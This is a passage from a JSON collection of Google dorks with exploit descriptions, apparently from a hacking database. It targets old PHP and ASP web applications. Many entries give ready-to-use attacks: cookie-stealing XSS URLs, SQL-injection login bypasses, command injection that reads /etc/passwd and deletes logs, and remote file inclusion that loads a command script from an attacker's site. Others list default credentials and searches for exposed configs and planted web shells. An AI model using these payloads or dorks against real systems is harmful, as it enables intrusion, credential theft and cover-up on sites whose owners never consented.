poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=\")}//-->alert(document.cookie)also a user can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version"}, {"dork": "inurl:nquser.php filetype:php", "description": "Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text \"Ping IP Address or Host Name\", example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=\"/>alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd"}, {"dork": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "description": "26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language'])) $language = strtolower($_GET['language']);//now we include the language filerequire_once(\"$language.lng\");...you can include whatever adding a null byte to \"language\" parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload & download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...) file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:\"Powered By: Simplicity oF Upload\""}, {"dork": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "description": "24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/news.php?newsid=\">alert(document.cookie)http://[target]/[path]/news.php?front_rating=\">alert(document.cookie)http://[target]/[path]/news.php?salt=\">alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=\">alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/catalog.php?catalogid=\">alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ' OR 'a'='aand pass : ' OR 'a'='a boom! you're admin ...the problem is in usercheck.php at line 5:$sql = \"select username from newsadmin where username='$checkuser' and password='$checkpass'\";you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment"}, {"dork": "\"Powered by FunkBoard\"", "description": "FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=\">alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = \" so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file"}, {"dork": "\"Powered by Xcomic\"", "description": "\"Powered by xcomic\"this is a recent exploit, you can retrieve any file on target systemby using \"../\" chars and null byte (%00), example:http://target/path_to_xcomic/initialize.php?xcomicRootPath=../../../../etc/passwd%00or launch commands:http://target/path_to_xcomic/initiailze.php?xcomicRootPath=http://[evil_site]/cmd.gif?command=ls%20-la%00where cmd.gif is a file like this:I have read an advisory copy here: http://forum.ccteam.ru/archive/index.php/t-57.html"}, {"dork": "\"Warning:\" \"Cannot execute a blank command in\"", "description": "\"Warning: passthru(): Cannot execute a blank command in\" \"Warning: system(): Cannot execute a blank command in\" \"Warning: exec(): Cannot execute a blank command in\" generally: \"Warning:\" \"Cannot execute a blank command in\" this a php error message, essentially it shows hacked pages links where someone leaved a backdoor and the page has error_reporting not set to 0... you can execute shell commands simply appending a var, guessing variable name, usually 'cmd' or 'command' or something else, example: http://[target]/[path]/somescript.php?cmd=cat%20/etc/passwd"}, {"dork": "\"Mail-it Now!\" intitle:\"Contact form\" | inurl:contact.php", "description": "Mail-it Now! 1.5 (possibly prior versions) contact.php remote code executionsite: http://www.skyminds.net/source/description: a mail form scriptvulnerability: unsecure file creation -> remote code executionwhen you post an attachment and upload it to the server (usually to \"./upload/\" dir )the script rename the file in this way:[time() function result] + [-] + [filename that user choose]spaces are simply replaced with \"_\" chars.So a user can post an executable attachment, calculate the time() result locallythen, if attachment is a file like this:can launch commands on target system, example:http://[target]/[path]/[time() result]-[filename.php]?command=cat%20/etc/passwdu can find my poc code at this url: http://rgod.altervista.org/mailitnow.html"}, {"dork": "\"maxwebportal\" inurl:\"default\" \"snitz forums\" +\"homepage\" -intitle:maxwebportal", "description": "several vulnerabilities relating to this.MaxWebPortal is a web portal and online community system which includes features such as web-based administration, poll, private/public events calendar, user customizable color themes, classifieds, user control panel, online pager, link, file, article, picture managers and much more. User interface allows members to add news, content, write reviews and share information among other registered users.h**p://www.maxwebportal.com/"}, {"dork": "\"e107.org 2002/2003\" inurl:forum_post.php?nt", "description": "e107 is prone to an input validation vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.Successful exploitation of this issue will permit an attacker to create arbitrary forum message posts.http://www.securityfocus.com/bid/14699"}, {"dork": "inurl:cartwiz/store/index.asp", "description": "The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534"}, {"dork": "intitle:\"Control panel\" \"Control Panel Login\" ArticleLive inurl:admin -demo", "description": "Build, manage and customize your own search engine friendly news / article site from scratch -- with absolutely no technical experience.Authentication bypass, sql injections and xss in ArticleLive 2005http://neworder.box.sk/explread.php?newsid=13582"}, {"dork": "\"powered by my little forum\"", "description": "My Little Forum 1.5 / 1.6beta SQL Injectionsoftware:site: http://www.mylittlehomepage.net/my_little_forumsoftware: \"A simple web-forum that supports classical thread view (message tree)as well as messagebord view to display the messages.Requires PHP > 4.1 and a MySQL database.\"1) look at the vulnerable code at line 144 inside search.php:... $result = mysql_query(\"SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL \". $time_difference.\" HOUR,'\".$lang['time_format'].\"') AS Uhrzeit, DATE_FORMAT(time + INTERVAL \".$time_difference.\" HOUR, '\".$lang['time_format'].\"') AS Datum, subject, name, email, hp, place, text, category FROM \".$forum_table.\" WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \" .$settings['search_results_per_page'], $connid);...now goto the search page, select \"phrase\", and type:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*if magic quotes are off you will have (guess?...) any admin/user password hash'cause $searchstring var is not filtered...u can fin my poc exploit here:http://rgod.altervista.org/mylittle15_16b.html2) 1.6beta is vulnerable even, we have:...$result = mysql_query(\"SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL \".$time_difference.\" HOUR) ASUhrzeit, subject, name, email, hp, place, text, category FROM \".$db_settings['forum_table'].\"WHERE \".$search_string.\" ORDER BY tid DESC, time ASC LIMIT \".$ul.\", \".$settings['search_results_per_page'],$connid);...you have same results, deleting a statement in injection string:[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata whereuser_name='[username]' /*"}, {"dork": "\"powered by mailgust\"", "description": "MailGust 1.9/2.0 (possibly prior versions) SQL injection / board takevorsoftware:site: http://www.mailgust.org/description:Mailgust is three softwares in one: * Mailing list manager * Newsletter distribution tool * Message Board Mailgust is written in php and uses a mysql database. vulnerability:if magic quotes off -> SQL Injectionwithout to have an account, a user can send himself a new admin password usingpassword reminder, in email field type:[yuor_email],'or'a'='a'/*@hotmail.comgive a look to what happen:220 [MAILSERVER] SMTP Service readyHELO [MAILGUST]250 [MAILSERVER].MAIL FROM:250 MAIL FROM: OKRCPT TO:250 RCPT TO:>[your_email] OKRCPT TO: OKDATA354 Start mail input; end with .Date: Sat, 24 Sep 2005 16:11:38 +0100Subject: New passwordTo: [your_email],'or'a'='a'/*@hotmail.comFrom: systemxxx@localhost.comYour login name is: [admin_email]Your new password is: 4993587Click here:http://localhost/mailgust/index.php?method=activate_new_password&list=maillistuser&pwd=4993587&id=1756185114to activate the password, than try to log in!It is recommended that you change your password afterwards..250 Mail acceptedQUIT221 [MAILSERVER] QUITvulnerable query is in [path_to_mailgust]/gorum/user_email.php at line 363:...$query = \"SELECT * FROM $applName\".\"_$userClassName \". \"WHERE email='$this->email'\";...it becomes:SELECT * FROM maillist_maillistuser WHERE email='[yuor_email],'or'a'='a'/*@hotmail.com'\"or'a'='a'\" is always true, so the query is always true, script doesn't fail, for mail function, theese are two valid email address,it will send the mail to [your_email] and to 'or'a'='a'/*@hotmail.com ;)activate the password, now you can login with [admin_email] as user and new passwordu can find my poc exploit here:http://rgod.altervista.org/maildisgust.html"}, {"dork": "intitle:\"CJ Link Out V1\"", "description": "A cross site scripting vunerability has been discovered in CJ linkout version 1.x. CJ linkout is a free product which allows you to easily let users connect to a different site with a frame at the top which links back to your site. The vulnerability report can be found at http://secunia.com/advisories/16970/ ."}, {"dork": "inurl:guestbook/guestbooklist.asp \"Post Date\" From", "description": "A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork): inurl:guestbook/guestbooklist.asp \"Post Date\" From Country Results 1 - 21 of 123Announcement: inurl:MainAnnounce1.asp \"show all\" Results 1 -20 of 86WebDirectory: inurl:webdirectory \"Total Available Web Sites\" Search Results 1 - 4 of 5MailingList: inurl:maillinglist/emailsadd.asp Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out."}, {"dork": "vBulletin Install Page Detection", "description": "inurl:/install/install.php intitle:vBulletin * Install System\nThis dork displays the untreated install.php pages!\nAuth0r: lionaneesh\nGreetz to :Team Indishell , INDIA , Aasim Shaikh ,"}, {"dork": "ionCube Loader Wizard information disclosure", "description": "inurl:loader-wizard ext:php\nThis dork displays sensitive information\nAuth0r: MaXe"}, {"dork": "allinurl:forcedownload.php?file=", "description": "Didn't see this anywhere in the GHDB, but its been known for a while and \r\n\r\nwidely abused by others.\r\n\r\n\r\n\r\nGoogle Dork \"allinurl:forcedownload.php?file=\"\r\n\r\n\r\n\r\nSites that use the forcedownload.php script are vulnerable to url \r\n\r\nmanipulation, and will spit out any file on the local site, including the \r\n\r\nPHP files themselves with all server side code, not the rendered page, but \r\n\r\nthe source itself. This is most commonly used on wordpress sites to grab the \r\n\r\nwp-config.php file to gain access to the database, but is not limited to \r\n\r\nwordpress sites. I only list it as an example, so people understand the \r\n\r\nweight of flaw.\r\n\r\n\r\n\r\n- DigiP"}, {"dork": "-site:simplemachines.org \"These are the paths and URLs to your SMF installation\"", "description": "Dork:\n-site:simplemachines.org \"These are the paths and URLs to your SMF\ninstallation\"\nDetails:\nThis google dork finds sites with the Simple Machines repair_settings.php\nfile uploaded to the root directory. This gives unauthenticated access to\nthe SQL username and password for the forum."}, {"dork": "inurl:demo.browse.php intitle:getid3", "description": "The getID3 demo can allow directory traversal, deleting files, etc.\nhttps://github.com/JamesHeinrich/getID3/blob/master/demos/demo.browse.php\nSean Murphy / Senior Developer / Wordfence\n4948 DD81 CF99 3510 DFF0 44A6 A6D8 401E D683 98F5"}, {"dork": "index of admin/fckeditor/editor/filemanager/", "description": "Dork: index of admin/fckeditor/editor/filemanager/\r\nDescription: will show some login and juicy information related to parent directory and details \r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of\" \"nrpe.cfg\"", "description": "*intitle:\"index of\" \"nrpe.cfg\"*\r\n\r\nThis dork helps to view sensitive information by pulling NRPE config file\r\nwhich is used for Nagios monitoring. This file can contain password for\r\ncustomized plugins and can also reveal internal IPs.\r\n\r\nPlease find the attached txt file containing details.\r\n\r\nThanks and Regards\r\nAnurag Muley"}, {"dork": "Dork: \"Index of\" \"upload_image.php\"", "description": "Hello ,\r\nDork Title: Vulnerable Files\r\nGoogle Dork: \"Index of\" \"upload_image.php\"\r\nDate: [11-06-2020]\r\nDork Author: Swapnil Talele"}, {"dork": "Dork: \"index of\" \"Production.json\"", "description": "Google Dork: \"index of\" \"Production.json\"\r\nDork Title: Files Containing Juicy Info\r\nDate: [11-06-2020]\r\nDork Author: Swapnil Talele"}, {"dork": "index.of.?.frm", "description": "Dork: index.of.?.frm\r\nDescription: This google dorks lists out sensitive frm files on web servers\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"schema.sql\"", "description": "# Google Dork: intitle:\"index of\" \"schema.sql\"\r\n# Vulnerable Files\r\n# Date: 08/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "\"index of /\" intext:wp-config \"zip\"", "description": "# Google Dork: \"index of /\" intext:wp-config \"zip\"\r\n# Vulnerable files\r\n# Date: 11/09/2021\r\n# Exploit Author: morningst4r"}, {"dork": "intitle: Index of /assets/admin/system", "description": "# Google Dork: intitle: Index of /assets/admin/system\r\n# Vulnerable Files\r\n# Date: 12/09/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "inurl:/supportboard", "description": "# Google Dork: inurl:/supportboard\r\n# Vulnerable Files\r\n# Date:16/09/2021\r\n# Exploit Author: Jamal Lalaoui\r\n# CVE: Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)\r\nSupport Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)"}, {"dork": "Google Dork: intitle:\"index of\" \"/sql\" \"admin\"", "description": "# Google Dork: intitle:\"index of\" \"/sql\" \"admin\"\r\n#Description: This Dork will return the important files containing admin setup to sql.\r\n#Date: 21/09/2021.\r\n#Exploit Author: Bon Sai"}, {"dork": "intitle:\"index of\" \"/cgi-bin\" \"admin\"", "description": "# Google Dork: intitle:\"index of\" \"/cgi-bin\" \"admin\"\r\n# Vulnerable Files\r\n# Date: 30/09/2021 \r\n# Exploit Author: Yash Singh"}, {"dork": "intext:\"powered by BlueCMS v1.6\"", "description": "# Google Dork: intext:\"powered by BlueCMS v1.6\"\r\n# Vulnerable Files\r\n# Date: 10-06-2021\r\n# Author: Rahul B Pallickal\r\n# Description: Google Dork to find the pages vulnerable to CVE-2020-19853"}, {"dork": "intitle:\"index of\" \"master03.xml\"", "description": "# Google Dork: intitle:\"index of\" \"master03.xml\"\r\n# Vulnerable Files\r\n# Date:03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"stylesheet.css\"", "description": "# Google Dork: intitle:\"index of\" \"stylesheet.css\"\r\n# Vulnerale Files\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"index of\" \"pres.xml\"", "description": "# Google Dork: intitle:\"index of\" \"pres.xml\"\r\n# Vulnerable Files\r\n# Date: 03/11/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "intitle:\"Index of\" site:.in", "description": "# Google Dork: intitle:\"Index of\" site:.in\r\n# Vulnerable Files\r\n# Date: 09/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "inurl:*gov intitle:\"index of\" \"docker-compose\"", "description": "# Google Dork: inurl:*gov intitle:\"index of\" \"docker-compose\"\r\n# Vulnerable Files\r\n# Date: 10/11/2021\r\n# Exploit Author: Leonardo Venegas"}, {"dork": "intitle:\"index of\" \"*.pl\"", "description": "# Google Dork: intitle:\"index of\" \"*.pl\"\r\n# Vulnerable Files\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"*.phtml\"", "description": "# Google Dork: intitle:\"index of\" \"*.phtml\"\r\n# Vulnerable Files \r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:\"index of\" \"*.php\"", "description": "# Google Dork: intitle:\"index of\" \"*.php\"\r\n# Vulnerable Files\r\n# Date: 12/11/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "intitle:index.of.etc", "description": "# Google Dork: intitle:index.of.etc\r\n# Vulnerable Files\r\n# Date: 02/12/2021\r\n# Exploit Author: Muhammad Al-Amin"}, {"dork": "inurl:.com index of movies", "description": "# Google Dork: inurl:.com index of movies\r\n# Vulnerable Files\r\n# Date: 18/12/2021\r\n# Exploit Author: Ved Kolambkar"}, {"dork": "allintext:wp-includes/rest-api", "description": "# Google Dork: allintext:wp-includes/rest-api\r\n# Vulnerable Files\r\n# Date: 01/01/2022\r\n# Exploit Author: Jayson Zabate"}, {"dork": "intitle:\"index of\" \"*.phtml\" site:.edu", "description": "# Google Dork: intitle:\"index of\" \"*.phtml\" site:.edu\r\n# Vulnerable Files\r\n# Date: 20/10/2023\r\n# Exploit Author: Ali Ahamed"}], "Vulnerable Servers": [{"dork": "intitle:\"Samba Web Administration Tool\" intext:\"Help Workgroup\"", "description": "This search reveals wide-open samba web adminitration servers. Attackers can change options on the server."}, {"dork": "\"ftp://\" \"www.eastgame.net\"", "description": "Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.\"thankyou4share\" !"}, {"dork": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", "description": "search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges."}, {"dork": "\"you can now password\" | \"this is a special page only seen by you. your profile visitors\" inurl:imchaos", "description": "IMchaos link tracker admin pages. Reveals AIM screennames, IP ADDRESSES AND OTHER INFO via details link. Logs can also be viewed and deleted from this page."}, {"dork": "\"Welcome to Administration\" \"General\" \"Local Domains\" \"SMTP Authentication\" inurl:admin", "description": "This reveals admin site for Argo Software Design Mail Server."}, {"dork": "inurl:rpSys.html", "description": "Web configuration pages for various types of systems. Many of these systems are not password protected."}, {"dork": "filetype:pl intitle:\"Ultraboard Setup\"", "description": "setup pages to the ultraboard system."}, {"dork": "intitle:\"Horde :: My Portal\" -\"[Tickets\"", "description": "Hi It will give you administrative ownership over Horde webmail system plus all users in Horde webmail system.. also php shell :) and much more ...Edited by CP"}, {"dork": "intitle:\"Uploader - Uploader v6\" -pixloads.com", "description": "File upload servers, dangerous if used in couple with mytrashmail.com"}, {"dork": "http://www.google.com/search?q=inurl%3Aindex.php%3Fpagedb%3Drss", "description": "CVE: 2007-4007\nEDB-ID: 4221\nThis google dork possibly exposes sites with the Article Directory (index.php page) Remote File Inclusion Vulnerability"}, {"dork": "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"r57shell 1.4\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"r57shell\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *\"", "description": "Locates r57 web shells Author: ScOrPiOn"}, {"dork": "\"www.*.com - c99shell\" OR \"www.*.net - c99shell\" OR \"www.*.org - c99shell\"", "description": "Locates c99 web shells Author: ScOrPiOn"}, {"dork": "\"CGI-Telnet Unit-x Team Connected to *.com\" OR \"CGI-Telnet Unit-x Team Connected to\"", "description": "Locates CGI-Telnet web shells. Author: ScOrPiOn"}, {"dork": "inurl:/vb/install/upgrade.php", "description": "Vbulletin custom updrade wizards. Author: ScOrPiOn"}, {"dork": "intitle:cyber anarchy shell", "description": "Submitter: eXeSoul cyber anarchy shell"}, {"dork": "MySQL: ON MSSQL: OFF Oracle: OFF MSSQL: OFF PostgreSQL: OFF cURL: ON WGet: ON Fetch: OFF Perl: ON", "description": "Author :- eXeSoul\nYou will get lots of web shells even some private shells."}, {"dork": "inurl:view.php?board1_sn=", "description": "locates a webapp vulnerable to SQL injection"}, {"dork": "inurl:php intitle:\"Cpanel , FTP CraCkeR\"", "description": "locates cpanel and ftp cracker. Author: alsa7r"}, {"dork": "filetype:php inurl:tiki-index.php +sirius +1.9.*", "description": "Finds servers vulnerable to the CVE-2007-5423 exploit. Author: Matt Jones"}, {"dork": "inurl:.php intitle:- BOFF 1.0 intext:[ Sec. Info ]", "description": "This search attempts to find the BOFF 1.0 Shell. Author: alsa7r"}, {"dork": "intitle:\"-N3t\" filetype:php undetectable", "description": "intitle:\"-N3t\" filetype:php undetectable\nSearch WebShell indexed on a page.\n-- \nJoel Campusano Rojas.\n632 161 62\n@joelcampusano\nIngeniero Civil en Inform\ufffdtica."}, {"dork": "inurl:/wp-content/w3tc/dbcache/", "description": "- Jay Townsend"}, {"dork": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "description": "gnu-bash site dorks\nAriel Anonis - @ariel_anonis"}, {"dork": "inurl:/proc/self/cwd", "description": "# Google Dork: inurl:/proc/self/cwd\r\n\r\n\r\n\r\nVulnerable web servers that have either been misconfigured or compromised in \r\n\r\nsome manner already, allow appending \"/proc/self/cwd/\" with the path of \r\n\r\nlocal server files. This could be from an LFI on an insecure PHP script like \r\n\r\nfile=/proc/self/cwd/some/path/to/file, or directly in the URL path of the \r\n\r\nsite like somesite.com/proc/self/cwd/some/exposed/stuff/here\r\n\r\n\r\n\r\n- digip"}, {"dork": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\" \t", "description": "Upload Vulnerability Elfinder 2.0\ninurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\""}, {"dork": "inurl:shop \"Hassan Consulting's Shopping Cart Version 1.18\"", "description": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion."}, {"dork": "\"YaBB SE Dev Team\"", "description": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others."}, {"dork": "intitle:\"Gallery in Configuration mode\"", "description": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!"}, {"dork": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "description": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache."}, {"dork": "inurl:ManyServers.htm", "description": "Microsoft Terminal Services Multiple Clients pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely."}, {"dork": "intitle:\"Terminal Services Web Connection\"", "description": "Microsoft Terminal Services Web Connector pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to a \"protected\" machine."}, {"dork": "intitle:\"Remote Desktop Web Connection\"", "description": "Microsoft Remote Desktop Connection Web Connection pages. These pages are not necessarily insecure, sine many layers of security can be wrapped around the actual use of this service, but simply being able to find these in Google gives hackers an informational advantage, and many of the sites are not implemented securely. In the worst case scenario these pages may allow an attacker to bypass a firewall gaining access to an otherwise inaccessible machine."}, {"dork": "\"Welcome to Intranet\"", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\" Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information."}, {"dork": "inurl:search.php vbulletin", "description": "Version 3.0.0 candidate 4 and earlier of Vbulletin may 